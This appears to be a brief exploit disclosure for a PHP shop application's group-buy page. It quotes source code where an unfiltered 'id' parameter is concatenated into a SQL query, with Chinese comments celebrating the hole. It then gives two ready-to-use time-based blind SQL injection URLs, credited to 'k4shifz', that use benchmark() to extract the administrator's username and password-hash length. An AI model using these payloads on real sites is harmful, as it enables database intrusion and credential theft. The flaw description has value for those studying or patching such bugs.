app\groupbuy.app.php:26:

 

  1. function index()  
  2.     {  
  3.         $id = empty($_GET['id']) ? 0 : $_GET['id'];  //id未过滤  
  4.         if (!$id)  
  5.         {  
  6.             $this->show_warning('no_such_groupbuy');   
  7.             return false;  
  8.         }  
  9.         // 团购信息  
  10.         $group = $this->_groupbuy_mod->get(array(  
  11.             'conditions' => 'group_id=' . $id . ' AND gb.state<>' . GROUP_PENDING,   //好的,进去了!!  
  12.             'join' => 'belong_store',  
  13.             'fields' => 'gb.*,s.owner_name'  
  14.         ));  
  15.  
  16.         if (empty($group))    //很多时候根本没有团购信息,所以是延迟注射了  
  17.         {  
  18.             $this->show_warning('no_such_groupbuy');  
  19.             return;  
  20.         } 

 

Exploit (by k4shifz):

/index.php?app=groupbuy&act=index&id=2 and if((select ascii(mid(user_name,1,1)) from ecm_member where user_id=1)=97,Benchmark(3000000,md5(1)),1)%23
/index.php?app=groupbuy&act=index&id=2%20and%20if((select%20length(password)%20from%20ecm_member%20where%20user_id=1)=32,benchmark(1000000,md5(1)),1)--